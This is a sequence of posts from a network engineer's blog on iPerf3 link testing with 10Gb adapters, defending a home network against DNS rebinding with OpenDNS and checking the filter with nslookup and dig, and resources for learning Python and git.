<a href="https://askubuntu.com/questions/980752/ubuntu-16-04-kvm-bridges-not-working">Ubuntu 16.04 kvm bridges not working</a><br />
<a href="https://askubuntu.com/questions/988052/bridge-networking-not-working-on-ubuntu-16-04">bridge networking not working on ubuntu 16.04</a><br />
<a href="https://linuxconfig.org/configure-network-interface-as-dhcp-client-on-rhel7-linux">Configure network interface as DHCP client on RHEL7 Linux </a><br />
<a href="https://stackoverflow.com/questions/24729024/open-firewall-port-on-centos-7">Open firewall port on CentOS 7</a><br />
<a href="https://askubuntu.com/questions/581771/kvm-create-a-virtual-machine-with-2-bridges-interfaces">KVM - Create a virtual machine with 2 bridges interfaces</a><br />
@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com0tag:blogger.com,1999:blog-690329124282786689.post-19057431357697379382018-08-11T16:08:00.000-07:002018-08-11T18:04:06.396-07:00Using iPerf3 to Test 2.5Gb/5Gb and 10Gb Links<span style="font-family: inherit;">I am a big fan of the iPerf3 tool written by ESnet, a part of the US Department of Energy. Here is a definition of iPerf from their official github page:</span><br />
<br />
<span style="font-family: inherit;">"iperf is a tool for active measurements of the maximum achievable bandwidth on IP networks. For each test it reports the measured throughput / bitrate, loss, and other parameters."</span><br />
<br />
<span style="font-family: inherit;">I have previously blogged about iPerf and how to use it on Windows, Mac OSX, IOS, Android and Linux. You can find that blog here - <a href="https://mwhubbard.blogspot.com/2014/12/using-iperf3-to-verify-link-speed_92.html">Using iPerf3 to verify Link Quality</a></span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<h3>
<span style="font-family: inherit;">Introduction </span></h3>
<span style="font-family: inherit;">IPerf can be used to test\verify any IP based link. Here are examples of what I have tested using iperf3:</span><br />
<br />
<ul>
<li><span style="font-family: inherit;">Remote access VPNs - When a user complains that his home Internet connection is 60Mbps but using VPN back to the office is "slow" you can verify the connection with iPerf. A lot of business Internet connections are asymmetric, for example 60Mbps down and 5Mbps up. When the user connects to the office they are on the 5Mbps upload side, not the 60Mbps download side! </span></li>
<li><span style="font-family: inherit;">Site to site VPNs - If you are experiencing a slow connection on a site to site VPN it could be the Internet connection at either site, the firewall at either site or the protocol being used to transfer data. With iPerf you can determine the root cause. </span></li>
<li><span style="font-family: inherit;">MPLS links - If you are having performance issues with an MPLS circuit the carrier will always say that their circuit is working correctly. An iPerf test will give you the data you need to push back. </span></li>
<li><span style="font-family: inherit;">Wireless access points - Anytime I deploy a new AP I set my laptop up in the MDF, connect wirelessly to the AP with a second laptop and verify the bandwidth. I have found problems with fibre connections, structured CAT cabling and even the carriers NID using iPerf. </span></li>
<li><span style="font-family: inherit;">Data center to central office - Depending on the carrier you may be able to use iPerf between the data center and the central office. That was actually my introduction to iPerf years ago when I worked for a carrier services group. </span></li>
<li><span style="font-family: inherit;">Virtual machine to virtual machine - Find bottlenecks in your virtual infrastructure.</span></li>
</ul>
<h3>
<span style="font-family: inherit;"> </span></h3>
<h3>
<span style="font-family: inherit;">Testing 10Gb site to site links</span></h3>
<span style="font-family: inherit;">A lot of customers are moving services to the data center and eliminating servers at remote sites. This presents a problem when you are asked to test the site to site link. </span><br />
<br />
<span style="font-family: inherit;">It's easy enough spin up a CentOS box on the virtual infrastructure at the data center as an end point but what to do at the remote site? I purchased an HP z420 workstation off lease on ebay for under $300. I also purchased an HP (Mellanox) 10Gb fiber card off ebay for under $30. </span><br />
<br />
<span style="font-family: inherit;">I installed Ubuntu on the Z420 and Mellanox had the correct driver on thier website. I purchased a single port card but with hindsight I should have purchased a dual port card. That would allow me to test from virtual machine to virtual machine over the 10Gb link (not the Z420's backplane) without needing two 10G capable Z420s.</span><br />
<br />
<span style="font-family: inherit;">I recently got to test new 10Gb links at a customer with four remote sites. The customer had HPE switches and luckily he had a 3m HP DAC cable so connecting the Z420 to the switches was easy. On ebay you can purchase 3m DAC cables for under $50. It's best to have a DAC cable made by the switch manufacturer to avoid compatibility issues. You can also find 10Gb optics for under $50 on ebay.</span><br />
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">The Z420 worked great and I was able to verify that each site was performing correctly. </span>But it was 110°F (43°C) outside and carrying the Z420, monitor and keyboard to each site wasn't ideal. What to do?</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<h3>
<span style="font-family: inherit;">Test MultiGig, NBASE-T and 10Gb with a Laptop?</span></h3>
<span style="font-family: inherit;">Laptops have started shipping with Thunderbolt 3 connections. Thunderbolt has a 40Gbps interface to 10Gb is well within its capability. A quick Google search turned up the following Thunderbolt 3 to 10Gb adapters:</span><br />
<span style="font-family: inherit;"><br /></span> <span style="font-family: inherit;"><a href="https://www.sonnettech.com/product/solo-10g-tb3.html">Sonnet Solo 10Gbase-T</a> - This Thunderbolt 3 to 10Gb copper adapter also supports 2.5Gb/5Gb Ethernet so you can test the new MultiGig and NBASE-T switches. The webpage only shows Mac/Windows but the 10Gbe controller is an </span><span style="font-family: inherit;">AQC-107S and there are Linux drivers for it. You have to build from source but there are detailed instructions in the readme. The cost is only $199 so it's within my budget!</span><br />
<span style="font-family: inherit;"><br /></span> <span style="font-family: inherit;"><a href="https://www.sonnettech.com/product/twin10g-sfp-thunderbolt3.html">Sonnet Twin 10G SFP+</a> - This Thunderbolt 3 to 10Gb adapter has two standard SFP+ ports. It uses the Intel 82599 controller so there are Linux/Mac/Windows drivers. The cost is $499 so it's outside the budget for my personal toolkit but is reasonable for a company.</span><br />
<br />
<span style="font-family: inherit;">Now, I just need to buy a new laptop with a Thunderbolt 3 port! The 17" <a href="https://system76.com/laptops/oryx">System76 Oryx Pro</a> is the model on my short list! It has Thunderbolt 3, nvidia 1060 (or 1070) and two m.2 NVME slots.</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<h3>
<span style="font-family: inherit;">References</span></h3>
<span style="font-family: inherit;"><a href="https://github.com/esnet/iperf">iperf3: A TCP, UDP, and SCTP network bandwidth measurement tool</a> </span><br />
<span style="font-family: inherit;"><a href="https://www.perfsonar.net/">perfSonar</a> - A bandwidth testing suite of tools. Available in ISO format in four different toolkits. You can build a complete distributed link quality system with web based dashboard using perfSONAR.</span><br />
<span style="font-family: inherit;"><a href="https://www.youtube.com/perfSONARProject">perfSONAR Project YouTube Channel</a> </span><br />
<span style="font-family: inherit;"><a href="http://www.rce-cast.com/Podcast/rce-99-perfsonar.html">perfSONAR Powered</a> - Podcast on the Research Computing and Engineering (RCE) podcast network </span>@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com1tag:blogger.com,1999:blog-690329124282786689.post-39910825093582116572018-08-04T23:34:00.000-07:002018-09-08T23:19:11.622-07:00DNS Rebinding attacksAs we all know, DNS is used to translate Domain names into IP addresses. DNS uses UDP so it has had a long history of being abused by hackers for DoS. To make matters worse it doesn't have authentication or encryption so Man in the Middle (MiTM) attacks are possible.<br />
<br />
Since DNS is used everytime you use the Internet it is hard to overstate the importance of a good DNS service. Companies like OpenDNS (Now Cisco Umbrella) and Quad 9 (www.quad9.net) have added security features like Malware detection and malicious site protection. These services are free for home use and paid for businesses.<br />
<br />
Recently an old type of attack using DNS has become popular again - DNS Rebinding. Tripwire has a good explanation of what a DNS rebinding attack is - <a href="https://www.tripwire.com/state-of-security/vert/practical-attacks-dns-rebinding/">Practical Attacks with DNS Rebinding</a>.<br />
<br />
Armis.com gives this definition for DNS Rebinding. See the references for the link to Armis.com's DNS Rebinding Exposes Half a Billion Devices in the Enterprise. There is a link in the reference section to a youtube video on how it works.<br />
<br />
**************************************************<br />
DNS Rebinding Attacks Explained<br />
<br />
DNS rebinding takes advantage of a nearly decade-old flaw in web browsers that allows a remote attacker to bypass a victim’s network firewall and use their web browser as a proxy to communicate directly with vulnerable devices on the local network. An example of a vulnerable device is one that is running an unauthenticated protocol like Universal Plug and Play (UPnP) or HTTP (used on unencrypted web servers). These protocols are commonly used to host administrative consoles (for routers, printers, IP cameras) or to allow easy access to the device’s services (for example, streaming video players), and are pervasive in businesses.<br />
**************************************************<br />
<br />
<h3>
Preventing the Attack</h3>
There are several things you should do on your home network to prevent attacks:<br />
<ul>
<li>Change default credentials - A lot of script based attacks work because the default credentials weren't changed.</li>
<li>Change the internal network IP address scheme - The scripts work by trying to log into common IP addresses used by network devices like 192.168.1.1 or 192.168.0.1 </li>
<li>Disable uPnP - Universal Plug and Play can be abused by attackers. If you are a gamer there are plenty of sites that will explain how to port forward once you turn off uPnP.</li>
<li>Update the firmware on you network devices - This is a MUST DO and is overlooked my most home users</li>
<li>Install DD-WRT on your SOHO router - There is a link in the reference section below.</li>
<li>Use OpenDNS </li>
</ul>
<br />
<h3>
Configuring OpenDNS to block rebinding attacks</h3>
I had been using Quad9 recently because it's fast, new and supports DNS over TLS along with DNSSec but decided to switch to OpenDNS because they offer rebinding filtering. Here is their explanation:<br />
<br />
**************************************************<br />
<b>Block internal IP addresses</b><br />
<br />
When enabled, DNS responses containing IP addresses listed in RFC1918 will be filtered out. This helps to prevent DNS Rebinding attacks. For example, if badstuff.attacker.com points to 192.168.1.1, this option would filter out that response.<br />
<br />
The three blocks of IP addresses filtered in responses are:<br />
<br />
10.0.0.0 - 10.255.255.255 (10/8)<br />
172.16.0.0 - 172.31.255.255 (172.16/12)<br />
192.168.0.0 - 192.168.255.255 (192.168/16)<br />
**************************************************<br />
<br />
To take advantage of this feature you need to create an OpenDNS account at <a href="https://login.opendns.com/">https://login.opendns.com</a>. Once you have an account, login and click on the Settings tab. At the bottom you will see a link "Keep your network's IP up-to-date with our free software." It says Mac and Windows but there is a Linux client also.<br />
<br />
When you click the link it start the download. Once it finishes, run the program. It will ask you to log into OpenDNS. The updater will show the public IP address of your router.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQlG0U7RlYtshTXriy-9Pd_09cVHlbX9kFBPulCtF4XuUJRCuwBLmjJqOcWzgkhZiq1za3TS1wIQYzg6PU5pKYQHqIw9iEGa0F-xDAHdf4Sytu0NYpuYcEbA1Z4gBotWwXrsXm8GrRJTJY/s1600/OpenDNSUpdater.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="292" data-original-width="326" height="286" id="id_5cfe_9989_520c_762f" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQlG0U7RlYtshTXriy-9Pd_09cVHlbX9kFBPulCtF4XuUJRCuwBLmjJqOcWzgkhZiq1za3TS1wIQYzg6PU5pKYQHqIw9iEGa0F-xDAHdf4Sytu0NYpuYcEbA1Z4gBotWwXrsXm8GrRJTJY/s320/OpenDNSUpdater.png" style="height: auto; width: 320px;" width="320" /></a></div>
<br />
Once you do that, go back to OpenDNS in the browser and click settings again. You should see the public IP address of your router listed under Add a network. Click Add This Network.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfQomu6yWUWbRF45cMG2o0ZOJeIDJguBFS5UWQ4XDI2mEe6CZKiZAUSDw8_D4_YAsxBhDddWsGlNXQbW3vk_xaZIzylA7vYkUP2aSENKtvt46wP-6JSX7PimYAaNtJx3k_TGvfLSYEUtxG/s1600/Selection_367.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="465" data-original-width="865" height="344" id="id_deaa_d010_2562_b7ce" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfQomu6yWUWbRF45cMG2o0ZOJeIDJguBFS5UWQ4XDI2mEe6CZKiZAUSDw8_D4_YAsxBhDddWsGlNXQbW3vk_xaZIzylA7vYkUP2aSENKtvt46wP-6JSX7PimYAaNtJx3k_TGvfLSYEUtxG/s640/Selection_367.png" style="height: auto; width: 640px;" width="640" /></a></div>
<br />
<br />
If you look at the updater now, you will see your public IP address listed. Back on the OpenDNS page click down arrow next to --Select a Network-- and select your network. On the dialog that opens, click on security and put a check in the box next to "Block Internal IP addresses"<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdmOK2_8ca1u5QW7rmtJCkHKJ-tgjbQSI4HzE6D5WxNUHgOOBJI0EKQMT1s3Big5pZoGV0adRXhI3z9WvuEqpv7Hixk4RyFED21q8Rj7ZWXj8GDUrq1KIKmvGLtolB-jFbEyfukUGGi2WS/s1600/Selection_366.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="626" data-original-width="859" height="466" id="id_db2_517_f6e8_4eb" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdmOK2_8ca1u5QW7rmtJCkHKJ-tgjbQSI4HzE6D5WxNUHgOOBJI0EKQMT1s3Big5pZoGV0adRXhI3z9WvuEqpv7Hixk4RyFED21q8Rj7ZWXj8GDUrq1KIKmvGLtolB-jFbEyfukUGGi2WS/s640/Selection_366.png" style="height: auto; width: 640px;" width="640" /></a></div>
<br />
<br />
Now, if a script tries to use an RFC1918 address to spoof a domain it will get filtered by OpenDNS. This isn't a silver bullet but just one more layer of defense.<br />
<h4>
</h4>
<h4>
Testing the Filter</h4>
Steve Gibson of Gibson Research wrote a DNS benchmark way back in 2010 that is free and works well for benchmarking DNS performance. He also created some DNS addresses for testing rebinding. There is a link to the original 2010 podcast (episode 260) and the July 24, 2018 update in the reference section.<br />
<br />
To test if your DNS server filters RFC1918 addresses, open a terminal or cmd window and enter the following:<br />
<br />
nslookup net4.rebindtest.com<br />
nslookup net10.rebindtest.com<br />
nslookup net127.rebindtest.com<br />
nslookup net172.rebindtest.com<br />
nslookup net192.rebindtest.com<br />
<br />
Below is the output before I configured the OpenDNS filter. Notice that the address returned for net172.rebindtest.com is 172.16.0.1 which would allow a malicious script to bypass the Same Origin Policy of the browser.<br />
<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #111111; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: white;">nslookup</span> <span style="color: white;">net172.rebindtest.com</span>
<span style="color: white;">Server:</span> <span style="color: #0086f7; font-weight: bold;">10.208</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">0.1</span>
<span style="color: white;">Address:</span> <span style="color: #0086f7; font-weight: bold;">10.208</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">0.1</span><span style="background-color: #0f140f; color: #008800; font-style: italic;">#53</span>
<span style="color: white;">Non-authoritative</span> <span style="color: white;">answer:</span>
<span style="color: white;">Name:</span> <span style="color: white;">net172.rebindtest.com</span>
<span style="color: white;">Address:</span> <span style="color: #0086f7; font-weight: bold;">172.16</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">0.1</span>
<span style="color: white;">Name:</span> <span style="color: white;">net172.rebindtest.com</span>
<span style="color: white;">Address:</span> <span style="color: white;">::ffff:</span><span style="color: #0086f7; font-weight: bold;">172.16</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">0.1</span>
</pre>
</div>
<br />
Below is the output after the filter was enabled. Notice that the address returned is 146.112.61.109.<br />
<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #111111; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: white;">nslookup</span> <span style="color: white;">net172.rebindtest.com</span>
<span style="color: white;">Server:</span> <span style="color: #0086f7; font-weight: bold;">127.0</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">0.53</span>
<span style="color: white;">Address:</span> <span style="color: #0086f7; font-weight: bold;">127.0</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">0.53</span><span style="background-color: #0f140f; color: #008800; font-style: italic;">#53</span>
<span style="color: white;">Non-authoritative</span> <span style="color: white;">answer:</span>
<span style="color: white;">Name:</span> <span style="color: white;">net172.rebindtest.com</span>
<span style="color: white;">Address:</span> <span style="color: #0086f7; font-weight: bold;">146.112</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">61.109</span>
<span style="color: white;">Name:</span> <span style="color: white;">net172.rebindtest.com</span>
<span style="color: white;">Address:</span> <span style="color: white;">::ffff:</span><span style="color: #0086f7; font-weight: bold;">146.112</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">61.109</span>
</pre>
</div>
<br />
What is 146.112.61.109 you ask? You could use nslookup to find out but I wanted to show the dig (DNS Information Groper) command. It's built into Linux/Mac and you can install it on Windows. Here is a blog I wrote on installing dig <a href="https://mwhubbard.blogspot.com/2015/01/dns-information-groper-for-windows.html">DNS Information Groper for Windows</a><br />
<br />
146.112.61.109 is the address OpenDNS uses for hit-block.opendns.com so the filter is working!<br />
<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #111111; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: white;">dig</span> <span style="color: white;">-x</span> <span style="color: #0086f7; font-weight: bold;">146.112</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">61.109</span>
<span style="color: white;">;</span> <span style="color: white;"><<>></span> <span style="color: white;">DiG</span> <span style="color: #0086f7; font-weight: bold;">9.11</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">3</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">ubuntu1.</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">-Ubuntu</span> <span style="color: white;"><<>></span> <span style="color: white;">-x</span> <span style="color: #0086f7; font-weight: bold;">146.112</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">61.109</span>
<span style="color: white;">;;</span> <span style="color: #fb660a; font-weight: bold;">global</span> <span style="color: white;">options:</span> <span style="color: white;">+cmd</span>
<span style="color: white;">;;</span> <span style="color: white;">Got</span> <span style="color: white;">answer:</span>
<span style="color: white;">;;</span> <span style="color: white;">->>HEADER<<-</span> <span style="color: white;">opcode:</span> <span style="color: white;">QUERY,</span> <span style="color: white;">status:</span> <span style="color: white;">NOERROR,</span> <span style="color: white;">id:</span> <span style="color: #0086f7; font-weight: bold;">1651</span>
<span style="color: white;">;;</span> <span style="color: white;">flags:</span> <span style="color: white;">qr</span> <span style="color: white;">rd</span> <span style="color: white;">ra;</span> <span style="color: white;">QUERY:</span> <span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">,</span> <span style="color: white;">ANSWER:</span> <span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">,</span> <span style="color: white;">AUTHORITY:</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">,</span> <span style="color: white;">ADDITIONAL:</span> <span style="color: #0086f7; font-weight: bold;">1</span>
<span style="color: white;">;;</span> <span style="color: white;">OPT</span> <span style="color: white;">PSEUDOSECTION:</span>
<span style="color: white;">;</span> <span style="color: white;">EDNS:</span> <span style="color: white;">version:</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">,</span> <span style="color: white;">flags:;</span> <span style="color: white;">udp:</span> <span style="color: #0086f7; font-weight: bold;">65494</span>
<span style="color: white;">;;</span> <span style="color: white;">QUESTION</span> <span style="color: white;">SECTION:</span>
<span style="color: white;">;</span><span style="color: #0086f7; font-weight: bold;">109.61</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">112.146</span><span style="color: white;">.in-addr.arpa.</span> <span style="color: white;">IN</span> <span style="color: white;">PTR</span>
<span style="color: white;">;;</span> <span style="color: white;">ANSWER</span> <span style="color: white;">SECTION:</span>
<span style="color: #0086f7; font-weight: bold;">109.61</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">112.146</span><span style="color: white;">.in-addr.arpa.</span> <span style="color: #0086f7; font-weight: bold;">3600</span> <span style="color: white;">IN</span> <span style="color: white;">PTR</span> <span style="color: white;">hit-block.opendns.com.</span>
<span style="color: white;">;;</span> <span style="color: white;">Query</span> <span style="color: white;">time:</span> <span style="color: #0086f7; font-weight: bold;">18</span> <span style="color: white;">msec</span>
<span style="color: white;">;;</span> <span style="color: white;">SERVER:</span> <span style="color: #0086f7; font-weight: bold;">127.0</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">0.53</span><span style="background-color: #0f140f; color: #008800; font-style: italic;">#53(127.0.0.53)</span>
<span style="color: white;">;;</span> <span style="color: white;">WHEN:</span> <span style="color: white;">Sat</span> <span style="color: white;">Aug</span> <span style="color: #0086f7; font-weight: bold;">04</span> <span style="color: #0086f7; font-weight: bold;">23</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">38</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">43</span> <span style="color: white;">PDT</span> <span style="color: #0086f7; font-weight: bold;">2018</span>
<span style="color: white;">;;</span> <span style="color: white;">MSG</span> <span style="color: white;">SIZE</span> <span style="color: white;">rcvd:</span> <span style="color: #0086f7; font-weight: bold;">91</span>
</pre>
</div>
<br />
<br />
<br />
<b> References</b><br />
<a href="https://www.twistlock.com/2018/02/28/dear-developers-beware-dns-rebinding/">Dear developers, beware of DNS Rebinding</a><br />
<a href="https://www.youtube.com/watch?time_continue=78&v=hMqL3iG4UfI">How DNS Rebinding Attacks Impacts The Enterprise</a> - youtube video<br />
<a href="https://www.csoonline.com/article/3290372/security/half-a-billion-smart-devices-vulnerable-to-decade-old-dns-rebinding-attacks.html">Half a billion smart devices vulnerable to decade-old DNS rebinding attacks </a><br />
<a href="https://www.armis.com/dns-rebinding-exposes-half-a-billion-iot-devices-in-the-enterprise/">DNS Rebinding Exposes Half a Billion Devices in the Enterprise</a><br />
<a href="https://www.grc.com/sn/past/2010.htm">DNS Rebinding</a> - Security Now podcast from 2010. Still applicable today.<br />
<a href="https://www.grc.com/sn/sn-673-notes.pdf">Security Now 673</a> - Show notes<br />
<a href="https://www.grc.com/dns/operation.htm">GRC DNS Benchmark</a> - Windows only<br />
<a href="https://mwhubbard.blogspot.com/search?q=dig">DNS Information Groper for Windows</a> - How to install dig on Windows<br />
<a href="https://dd-wrt.com/">DD-WRT</a> <br />
<a href="http://hilite.me/">Convert code samples into HTML for blogger</a>@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com0tag:blogger.com,1999:blog-690329124282786689.post-27794700935468430082018-07-27T23:34:00.036-07:002022-11-20T20:39:50.323-08:00Learning Python 3<div>Updated September 10th, 2022</div><div><br /></div>Here are some of the resources I used to start learning python. With my newly learned Python skills and some Google-Fu I have been able to automate several network device tasks. You can find most of my python scripts at <a href="http://github.com/rikosintie">Hubbard on Networking GitHub Repo</a>.<br />
<br />You do NOT need to know anything about python to use the scripts. This is just like you don't have to know how to program to run "show interface g1/0/1". You simply download the script and execute it.<div><br />I found this tweet that has a curated list of python resources:<div><a href="https://twitter.com/ayushi7rawat" target="_blank">A curated list of Ultimate Python resources</a></div><div><br />
<br />
<h3>
Why You Should Learn Python</h3>
A lot of the tasks that network engineers perform are repetitive, mind-numbing, and error-prone. With a little python skill, you can automate these tasks and spend the time you save on more productive tasks, like learning more python.<br />
<br />
As networking moves away from the CLI and into software-defined networking (SDN) you will need to have some dev skills. Cisco has a three-part video on how the network engineer's job is changing. You will need to register with Cisco Devnet to watch it but you should have a Devnet account if you going down this path:<br />
<a href="https://learningnetwork.cisco.com/docs/DOC-33696">Lesson 1: The Network Engineer of Old</a><br />
<br />
If you have never used Python at all, this blog is the place to get started!<br />
<br />
First, to install python, head over to the Python download page - <a href="https://www.python.org/downloads/">Download Python</a><br />
Follow the instructions to install python on your OS of choice.<br />
<div>
<br /></div>
<h3>
Tools</h3>
There isn't much needed to use Python other than python itself but like most things, life is easier with some tools.<br />
<br />
<h4>
Integrated Development Environment (IDE)</h4>
IDEs are tools that allow you to write and debug code. Once you start writing scripts that are more than a few lines long you will want to use an IDE.<br />
<br />
<a href="https://thonny.org/">Thonny</a> - Python IDE for beginners. A free Integrated Development Environment. This tool is great for learning. It lets you step through a script and see exactly what is happening.<br />
<br />
<a href="https://codewith.mu/en/">MU</a> - a simple Python editor for beginner programmers. This one is really nice. It's cross-platform and has support for Linux, Mac, Windows, and Raspian. What separates it from the other tools listed here is the support for small devices like Adafruit and Micro:bit. Here is a screenshot of MU starting up:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4bL1GDOERbxocHonuzcX2x-K0VT_0_cNOWm0gGfvUKK4njE8iLCWH4c1W72Gp_uiRguMhTQEqUT_zs53fJVAzn0G7JteMJ-xCt0qEg51XvVgLWNlEn4TcarxKL9yEUaPX0BXrXEZC5CQV/s1600/Selection_365.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="439" data-original-width="605" height="288" id="id_3ae9_6c49_a1c1_6e54" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4bL1GDOERbxocHonuzcX2x-K0VT_0_cNOWm0gGfvUKK4njE8iLCWH4c1W72Gp_uiRguMhTQEqUT_zs53fJVAzn0G7JteMJ-xCt0qEg51XvVgLWNlEn4TcarxKL9yEUaPX0BXrXEZC5CQV/s400/Selection_365.png" style="height: auto; width: 400px;" width="400" /></a></div>
<br />
<br />
<a href="https://code.visualstudio.com/">Microsoft Visual Studio Code</a> - A free open source IDE from Microsoft. VSCode has turned into an amazing development environment and can be used for any size project. It has an integrated debugger that looks just like the Powershell ISE tool. It supports almost every programming language, not just python. The open-source version of PowerShell is fully supported which is great. I can use one tool and create Python and PowerShell scripts. <br /><br />There is a Visual Studio Marketplace with thousands of plugins, similar to the Chrome store or Firefox store. <a href="https://marketplace.visualstudio.com/vscode">Extensions for the Visual Studio family of products</a><br /><br />
I have more detail on my macOS blog. Once you have VScode installed it works the same on Windows, Mac, and Linux so the blog is useful regardless of what OS you use. <a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#VSCode">My VSCode install blog</a><br />
<h4>
Code Editor</h4><div>You can definitely use VSCode as your editor. It has about every feature that you could want. But I have been using Sublime text since before VSCode came out and old habits die hard! If you are on Ubuntu 22.04 you can install Gnome Text Editor (I know, really, really stupid name) and it works great for quick editing.<br /><br /></div>
<a href="https://www.sublimetext.com/3">Sublime text</a> - Sublime is a text editor that is optimized for programming. It has a huge community around it and thousands of plugins. It's $75.00 but the license lets you run it on as many machines as you own. I bought it and installed it on my Linux, Windows, and Mac laptops. It has a tabbed interface like notepad++ which I like. You can also split the screen and open two files side by side. This is useful because you can have your script on one side and the data file on the other. <br />
<br />
Realpython.com sells a great tutorial that walks you through installing Sublime text optimized for Python. It includes video and text for Mac, Linux, and Windows. This tutorial is well worth the cost and has improved my productivity in Sublime.<div><br /></div><div>In the next section, I discuss revision control with Git. Sublime text has several plugins that integrate Git into your workflow. One I really like is Git Gutter. It puts a + sign next to lines that have changed, then you can revert easily if the change didn’t work.<br />
<a href="https://realpython.com/products/sublime-python/">Your Shortcut to a Professional Python Development Setup</a><br />
<br />
<h4>
Revision Control</h4>
Git - A revision control system. It's useful once you start writing scripts large enough to have bugs or future enhancements. Even if you don't program in python it's worth installing git because of github.com and gitlab.com.<br />
<br />
Both of these sites have thousands of python tools. If you have git installed on your computer all you have to do to use them is "git clone <repository>". For example, to install the ARP sorting tool I wrote, you simply go to <a href="https://github.com/rikosintie/ARP-Sort">ARP-Sort</a> and click the "Code" button. It will display the URL for the project. Click the copy button, type “git clone” and paste the URL you copied into the terminal, then press enter:</div><div><br />
git clone <span style="color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , "courier" , monospace; font-size: 12px;">https://github.com/rikosintie/ARP-Sort.git</span><br />
<br />
This downloads the project and unzips it into the folder ARP-Sort.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0P52WruPbxBEY6AZ4ciQUl7qDi1a5RxxIUGdpGgv441UbGbUOg6tc22BMLBgNtjvJcpVWiyI-sxNjt-SOOFNyLgLg4kX2CVSmUoHrD9kpb6apC6sI4e3cw1N-dEtIMqPVnQNW57EKutQpXVCBv0UJ3P5skGaxMR6VZRi4Q2aBcNVMQdLW_l_gDqJcNQ/s385/Screen%20Shot%202022-06-15%20at%2020.56.33.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="326" data-original-width="385" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0P52WruPbxBEY6AZ4ciQUl7qDi1a5RxxIUGdpGgv441UbGbUOg6tc22BMLBgNtjvJcpVWiyI-sxNjt-SOOFNyLgLg4kX2CVSmUoHrD9kpb6apC6sI4e3cw1N-dEtIMqPVnQNW57EKutQpXVCBv0UJ3P5skGaxMR6VZRi4Q2aBcNVMQdLW_l_gDqJcNQ/s320/Screen%20Shot%202022-06-15%20at%2020.56.33.png" width="320" /></a></div><br /><div><br />
<div class="separator" style="clear: both; text-align: center;"><br /></div>
Someone has created an online game for learning Git - <a href="https://ohmygit.org">An open source game about learning Git!</a></div><div><br />
Install git from <a href="https://git-scm.com/">https://git-scm.com/</a><br />
<a href="https://git-scm.com/book/en/v2">Pro Git book</a> - A free online book on git<br />
